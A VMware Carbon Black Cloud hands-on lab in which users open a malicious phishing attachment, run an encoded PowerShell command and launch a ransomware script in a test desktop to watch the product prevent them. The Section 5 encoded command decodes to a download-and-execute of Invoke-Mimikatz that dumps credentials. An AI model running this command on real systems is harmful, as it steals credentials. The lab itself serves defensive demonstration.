VMware Carbon Black Cloud Malware Lab

 

About This Experience


This walkthrough will enable you to get hands on with Carbon Black Cloud. The Malware Lab contains actual attacks that you can run live in a test environment to see how prevention and visibility work in the Carbon Black Cloud solution suite. 

What is Carbon Black Cloud?

The VMware Carbon Black Cloud is a security solution suite comprised of the following products that may be used together or alone with a single lightweight agent and cloud-based console: 

  • Endpoint Standard: Next-generation antivirus (NGAV) and endpoint detection and response (EDR) solution. Carbon Black Endpoint Standard provides multiple layers of prevention to prevent/detect a variety of attacks such as known malware, non-malware, and fileless 
  • Enterprise EDR: Enables advanced threat-hunting with out-of-the-box watchlists curated by Carbon Black and third parties like MITRE as well as the capabilities for creating and tracking customized indicators of compromise (IOCs) 
  • Audit & Remediation: Allows admins to gather current-state information across software, hardware and network variables, at scale across your environment leveraging osquery schema 

For more security best practices for Carbon Black Cloud please visit VMware Carbon Black TechZone here

 

Overview


Before You Begin

Carbon Black Cloud Background

Attack Lab Detonation

Resources and References

  • Additional Resources

 

Before you Begin


In order to complete this product walkthrough please make sure you have the following:

  • A valid account in the VMware TestDrive environment, sign up here if you do not have one.
  • TCP & UDP ports 80, 443, 8443; and if using PCoIP, both TCP & UDP 4172
  • An Horizon Client installed on your machine.

 

Section 1: Accessing the Environment

To login to the environment, perform the following steps.

First, open a web browser of your choice and navigate to portal.vmtestdrive.com. Select LOG IN. If you do not already have an account please reference the instructions found here.

mceclip2.png

Enter your TestDrive Username and Password and select ENTER.

mceclip3.png

Next, locate the VMware Carbon Black Endpoint product under the Intrinsic Security tab.

mceclip0.png

Click LAUNCH and LAUNCH VIA WORKSPACE ONE.

mceclip1.png

A new tab will open with Workspace ONE. Enter your TestDrive Username, then hit Next.

mceclip1.png

On the next screen, enter your TestDrive Password then hit Sign in.

mceclip2.png

Next, search for the Carbon Black Malware desktop. Click to open into the desktop either via HTML access or Horizon Client access.

mceclip0.png

Now you'll be on the Carbon Black Malware desktop. At this point you can begin the walkthrough steps listed below.

mceclip1.png

 

Carbon Black Cloud Background


 

Section 2: Walkthrough of the Carbon Black Cloud

The following section details the basics of accessing and using the Carbon Black Cloud. If you are familiar with the Carbon Black Cloud you may skip the informational section one. For more a more in-depth walkthrough of the CBC please see the “Endpoint Standard Hands-On Lab” located here: https://labs.hol.vmware.com/HOL/catalogs/lab/10096 

2.1 Accessing the Carbon Black Cloud

The Carbon Black Cloud console is web-based with one lightweight agent deployed to endpoints. The single agent allows for consolidation across AV, EDR, vulnerability, and security auditing technologies. No stand-up or maintenance of on-premises servers is required – offloading work from infrastructure and security teams. 

The console is accessed through a supported web browser: 

  • Windows: Chrome, Edge, Firefox 
  • MacOS: Chrome, Firefox, Safari 

Login to Carbon Black Cloud: 

  • URL: https://defense-prod05.conferdeploy.net/
  • User: (listed in text file Carbon_Black_Cloud_Malware_Credentials.txt on the Carbon Black Malware desktop)  
  • Password: (listed in text file Carbon_Black_Cloud_Malware_Credentials.txt on the Carbon Black Malware desktop)

For purposes of this lab use Google Chrome to access the console. On login you will land on the CBC Dashboard. The main navigation menu is located on the left-hand side of the web console.  

mceclip0.png

CBC Dashboard | The dashboard gives a high-level overview of your environment with interactive widgets.

 

2.2 Alert Walkthrough

The Alerts page displays events of known threats or potential risks to your environment. To navigate to the Alerts page, select Alerts from the left-hand menu. 

image__2_.png

Regularly review alerts to determine whether action needs to be taken or policies need to be modified. Alert notifications can be setup to email designated administrators when an alert occurs. Alerts can also be forward to a SIEM with the Carbon Black open API (https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/).

 

An alert will show: 

  • Status – Run status and policy status
    • Run Status: process ran/did not run
    • Policy status: policy applied/no policy applied
  • First Seen – What time the events of alerts first occurred 
  • Reason – High level overview of the reason the alert occurred 
  • S(everity) – Numerical score from 1 to 10, 1 being lowest severity and 10 being highest 
  • T(arget Value) – Acts as a multiplier for the severity score; target value can be assigned per policy group 
  • Device – Device that was alerted upon 

Alert severity indicates the relative importance of an alert and acts as a prioritization assistant (one being lowest severity and ten being highest, mission critical). The following describe the ranges of severity:  

  • Severity 1-2: Activities such as port scans, malware drops, changes to system configuration files, persistence, etc. 
  • Severity 3-5: Activities such as malware running, generic virus-like behavior, monitoring user input, potential memory scraping, password theft, etc. 
  • Severity 6-10: Activities such as reverse command shells, process hollowing, ransomware, destructive malware, hidden processes and tool sets, applications that talk on the network but should not, etc. 

Filters are available on the left-hand. This can be used to filter into alerts of interest by device, severity, etc. 

 

To view additional information about an alert, click the chevron to expand. The Alert Details show additional information about the processes, behaviors (or TTP’s – Tactics, Techniques, and Procedures), recommended steps for remediation, and notes/tags. 

mceclip1.png

CBC Alerts – Alert Details | Alert Details show additional information for further investigation into malicious/suspicious events. 

 

The Techniques section in Alert Details shows what behaviors, or TTPs (tactics, techniques, and procedures), were exhibited by the specified process. TTP’s are color coded, with red being a higher severity. TTP’s can be clicked into to view further information about the TTP and what it means. Carbon Black also correlates MITRE techniques to TTPs which are also displayed. Clicking a MITRE technique will take you directly to the MITRE page correlating to that technique. 

 

An alert visualization is generated for all alerts that occur. The visualization provides an easy to understand and digest view of what occurred during the attack sequence. To view an alert visualization, called the Alert Triage, click the tree icon) in the upper right of alert details.

mceclip3.png

CBC Alerts | You can quickly pivot to the Alert Triage (tree icon), Investigate, or additional actions with the linked buttons.

 

The Alert Triage displays a tree containing events associated with the alert. A node represents an individual process or event. You can click a node to view additional process details on the right including reputation, TTPs (behaviors), command line used, and other information. The Alert Triage provides actionable information about the events that occurred during an alert: including where prevention was applied, source, and what the attacker may have been attempting.

mceclip4.png

CBC Alerts – Alert Triage| Alert Triage shows alert in visual format; each node can be clicked into for more details about the selected process on the right.

 

The alert can be viewed in a log level format as well for more rich, process level behavioral information such as: command line, parent command line, if the device was on or off-premise at the time of the event, etc. These logs can be viewed in the Enriched Events section, which you can find by scrolling down to the bottom of the Alert Triage page.  

mceclip5.png

CBC Alerts – Enriched Events| Click the chevron next to an enriched event to view additional details. 

2.3 Policies Walkthrough

The CBC next-gen AV and EDR solution offers flexible Policies. Policies determine preventative rules as well as sensor functionality. Carbon Black gives administrators control and visibility into how prevention works in your environment. 

 

Each endpoint with a sensor installed will belong to a single policy. A policy defines how the sensor should behave on the endpoint, blocking/preventative rules, exclusions and allowances, and other configurations. 

 

In this lab we have put the Horizon TestDrive endpoints into the ‘Virtual Desktops’ policy group that copies settings from 'Standard' with some adjustments for VDI. The Standard policy group comes OOTB (alongside the Monitored and Advanced policies) and is meant to act as a day-one, production viable policy that gives additional preventative layers beyond a traditional AV. 

 

To view information about Policies and the Standard Policy Rules, navigate using the main left-hand menu to Enforce -> Policies. On the ‘Prevention’ tab you can see rules associated with the selected policy group. 

mceclip6.png

CBC Policies – Prevention Rules| Carbon Black offers OOTB production viable policies for day-one use while giving admins visibility and customizability into what is prevented and allowed.

 

Review the rules within the Standard policy before proceeding. In this lab the attacks ran will be prevented by rules within this policy, including rules for: 

  • Process: Known Malware 
  • Process (At Path): Excel, Invokes a command interpreter
  • Process: Not Listed, Performs ransomware-like behavior 

 

 

Attack Lab Detonation


 

Section 3: Attack Approach

Our prevention is enabled through context and controls to disrupt and defend - it doesn’t matter if its ransomware or a zero day. 

 

Most adversarial threats (like ransomware) will follow a multi-staged attack approach. This begins with initial access, or through the cognitive attack loop phases reconnaissance and infiltration. During this phase attackers select a target and gather relevant information such as vulnerabilities, network topology, employee information, and so forth. Information gathered during this stage can then be used to infiltrate, or deliver, an attack. 

 

Once access is attained, adversaries move into the next phases of the attack sequence: maintain and manipulate. The attacker is using their initial access to continue to improve their position and move forward with their goals. 

 

During the final attack phases of execute and exfiltrate the attacker is executing their end goals. For example, an attacker at this stage may be encrypting your data, holding it for ransomware, or even exfiltrating sensitive data for malicious use. Whatever the attackers end goal is – we don’t want them to be successful.

 

In this lab you will be able to detonate different attack scenarios – each of which align with the previous attack approach stages. Before beginning any of the simulations make sure that you understand the Carbon Black Cloud through either prior use or section one of the lab. 

 

 

Section 4: Spearphishing/Known Malware - Infiltrate

Spearphishing is a common technique to infiltrate and gain initial access to an environment. Much of the data attackers use to make an email seem legitimate is available online – and even posted by companies themselves. Public information such as employees, current projects, organizational charts, and so forth can be used to make a message appear legitimate to even discerning employees. 

 

4: Attack Instructions

4.1 Run the Attack

A phishing email is included in this lab. Let’s launch the message, taking the place of a well-meaning employee who has assumed the email’s legitimacy.  

  1. Open spearphishing email on Desktop "Please review ASAP.msg” 

Note: If 'Welcome to Outlook' message appears click 'Next'. Then select 'No' when prompted to setup Outlook with an email account. Finally click the checkbox next to 'Use Outlook without email account' and click 'Finish'.

 

The attachment contains known malicious signatures.  

  1. Double click the .docm attachment to open 

Note: If prompted to run in safe mode select 'no'

 

Notice that prevention is applied by the popup in the lower right-hand of the screen. Carbon Black administrators can choose to have popup messages when prevention is applied on the endpoint and even customize the message the popup contains. 

 

4.2 Investigate

We will now pivot to the Carbon Black Console to review information about the attack we just ran. If you are not currently on the Alerts page, navigate to Alerts using the left-hand menu. 

It is recommended to filter by endpoint to view alerts associated with the attacks run in your lab. Click the Carbon Black Malware Chrome shortcut on the Desktop to automatically be navigated to the Alerts page filtered by the appropriate tags.

You can find your device name by going to Windows Start -> Settings -> System -> About.

  1. Click to expand the Device tag on the left 
  2. Click the device name associated with your VDI instance 

mceclip0.png

In the spearphishing alert Carbon Black applied prevention due to the reputation of the file.  

  1. Click the chevron to view alert details 
  2. Click the tree icon to go to the alert triage 

Any nodes that have a red shield icon indicate that prevention was applied. Prevention actions are Deny (process not killed, prevents execution of behavior) or Terminate (kills process). Prevention actions can be configured in the policies. 

mceclip1.png

  1. Click the trickbot.docm node 

The prevention occurred due to reputation – Carbon Black Cloud assigns reputation based on known bad signatures, company assigned reputation, and cloud analytics. Note that for trickbot.docm the reputation is known malware and due to this prevention was applied. 

 

 

Section 5: Non-Malware/Trusted Tools - Maintain and Manipulate

After achieving initial access attackers attempt to move forward with their goals. One of the best ways of doing that is scraping credentials or abusing other existing binaries in the environment – like PowerShell. A trusted program like PowerShell is not blocked by traditional signature-based AV. It is commonly used across Windows environments for legitimate purpose – but attackers can leverage it for malicious intent as well. 

In this attack we will leverage PowerShell to attempt to perform malicious actions. Unlike the last alert we ran, PowerShell will not have a known malware reputation. Instead, Carbon Black applies prevention by looking at the behaviors that applications exhibit as well as recognizing that PowerShell is trying to execute content that contains malware (Mimikatz). Behavioral based rules can be specified to apply prevention to even trusted tools if they are being used maliciously.  

 

5: Attack Instructions

5.1 Run the Attack

We will use PowerShell to attempt to run an attack leveraging Mimikatz. The command has been encoded for further obfuscation. 

  1. Run PowerShell with administrative privileges (right click to run as admin) 
  2. Run command Set-ExecutionPolicy Unrestricted 
  3. Run command below
powershell.exe -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAAIgBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBQAG8AdwBlAHIAUwBoAGUAbABsAE0AYQBmAGkAYQAvAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvAG0AYQBzAHQAZQByAC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEQAdQBtAHAAQwByAGUAZABzACIA

Carbon Black applies prevention killing off the malicious PowerShell instance. PowerShell attempts to leverage Mimikatz to scrape credentials. We can recognize this malicious behavior and kill off the malicious instance while preventing the malicious actions. Note that PowerShell was allowed to run as expected until it began behaving maliciously. 

 

5.2 Investigate

We will now pivot to the Carbon Black Console to review information about the attack we just ran. If you are not currently on the Alerts page, navigate to Alerts using the left-hand menu. 

  1. Navigate to the new alert (severity 8) and click the chevron to expand alert details 

Screen_Shot_2021-08-18_at_2.41.01_PM.png

The reputation for PowerShell is trusted whitelist – which is expected; in most cases we expect PowerShell to run normally without prevention as it is used in many everyday IT activities. The power of Carbon Black is to define the behaviors that we want to prevent while allowing PowerShell to run when it should 

  1. Click the tree icon to go to the alert triage 

Screen_Shot_2021-08-18_at_2.43.55_PM.png

  1. Click the first PowerShell.exe node 

In this attack PowerShell attempted to run encoded commands. Carbon Black automatically decodes encoded PowerShell scripts – easing time to remediation and enhancing investigative ability. 

  1. Click the CMD link in the process details pane on the right-hand side of the screen 

Screen_Shot_2021-08-18_at_2.41.57_PM.png

We can now see the formatted PowerShell script. In this case PowerShell downloads and attempts to invoke Mimikatz before being prevented by Carbon Black. The malicious actor would attempt to use Mimikatz to grab credentials for further attack actions.

  1. Click the 'X' to close out of the CMD Line screen
  2. Click the second PowerShell.exe node

Note the red shield icon indicating that Carbon Black applied prevention. Additional process details including behaviors exhibited by the specific instance of PowerShell can be viewed on the right.

Screen_Shot_2021-08-18_at_2.42.15_PM.png

 

Section 6: Ransomware - Execute and Exfiltrate

One of the biggest concerns we see in the security space is ransomware; for good reason because of how costly and destructive this type of attack can be. Ransomware such as RYUK and Conti will attempt to distribute across the network and encrypt/destroy data for maximum impact. In recent years ransomware has shown a drastic increase in both commonality and the level of destruction on users' systems. This stage is often detrimental. 

 

6: Attack Instructions

6.1 Run the Attack

Embedded in PowerShell we have stripped the ransomware signature from this binary in order to highlight behavioral based ransomware protection. This imitates the situation of a zero-day ransomware attack. 

  1. Run PowerShell with administrative privileges (right click to run as admin) 
  2. Change directories with command cd 'C:\Users\Public\Desktop\Ransomware Artifacts\'
  3. Run command Set-ExecutionPolicy Unrestricted 
  4. Run command .\ryuk.ps1 

Notice that prevention is applied. When we visit the Carbon Black console, we can dig further into how we saw ransomware-like behaviors to prevent this modified piece of ransomware.

 

6.2 Investigate

We will now pivot to the Carbon Black Console to review information about the attack we just ran. If you are not currently on the Alerts page, navigate to Alerts using the left-hand menu. 

 

Through our native AMSI scripting integration Carbon Black Cloud is uniquely able to analyze and prevent scripts prior to allowing the binary to execute in your environment, ultimately reducing your overall risk. Even while applying prevention administrators can still get visibility into what an attacker/attack was attempting to do.

 

Screen_Shot_2021-07-30_at_2.43.10_PM.png

 

Click into the triage for more details. Scrolling down to the enriched events we can expand details for PowerShell. We can see the associated ransomware-like behaviors.

 

Screen_Shot_2021-08-02_at_5.59.10_PM.png

 

Beyond AMSI scripting integration Carbon Black has robust ransomware preventative capabilities. Carbon Black NGAV/EDR can detect and prevent upon behaviors associated with ransomware. Those behaviors include detecting/preventing access of the master boot record, modification of volume shadow copies, and the encryption of data. Additionally, alongside the Carbon Black agent we deploy canary/decoy files to track and kill processes attempting to encrypt, modify or delete our files. We can apply prevention to anything exhibiting those behaviors, even something that is not listed or never seen before (like a zero-day). 

 

Screen_Shot_2021-08-02_at_6.11.38_PM.png

  

 

Additional Resources


 

Contact

Carbon Black Endpoint Standard NGAV/EDR

Additional Carbon Black TestDrive Experiences

Have more questions? Submit a request

Article is closed for comments.